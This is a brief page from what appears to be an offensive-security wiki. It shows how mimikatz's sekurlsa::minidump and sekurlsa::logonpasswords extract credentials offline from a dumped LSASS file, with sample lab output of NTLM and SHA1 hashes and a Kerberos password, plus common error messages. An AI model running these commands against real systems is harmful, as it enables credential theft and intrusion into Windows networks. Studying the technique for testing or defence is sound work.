minidump
sekurlsa::minidump can be used against a dumped LSASS process file and it does not require administrative privileges. It's considered as an "offline" dump.
1
mimikatz # sekurlsa::minidump file.dmp
Copied!
1
mimikatz # sekurlsa::logonpasswords
2
โ€‹
3
Authentication Id : 0 ; 3113147 (00000000:002f80bb)
4
Session : Interactive from 2
5
User Name : DWM-2
6
Domain : Window Manager
7
Logon Server : (null)
8
Logon Time : 13/10/2021 20:58:06
9
SID : S-1-5-90-0-2
10
msv :
11
[00000003] Primary
12
* Username : WIN10$
13
* Domain : hacklab
14
* NTLM : 2c60cae5c83d27b349e98662de463dfc
15
* SHA1 : fd6e6c6616156dac734f87d1eec386fa29537d89
16
tspkg :
17
wdigest :
18
* Username : WIN10$
19
* Domain : hacklab
20
* Password : (null)
21
kerberos :
22
* Username : WIN10$
23
* Domain : hacklab.local
24
* Password : 8us/0-5sE3:_bd4\B+nEqpI#j,[avKJ'7l5RpDew]EEXya=tZq7g,jAifx%-sgv)[email protected]];gmb=gSE4K?"D\B+ CBW>vD5*/k71q'iI#V4$otG4t9R[
25
ssp :
26
credman :
27
cloudap : KO
Copied!
According to Benjamin the following errors might be raised:
  • ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->MajorVersion (A) != MIMIKATZ_NT_MAJOR_VERSION (B) minidump is opened from a Windows NT of another major version (NT5 vs NT6).
  • ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (A) != PROCESSOR_ARCHITECTURE_xxx (B) minidump is opened from a Windows NT of another architecture (x86 vs x64).
  • ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002) The minidump file is not found (check path).
Last modified 6mo ago
Copy link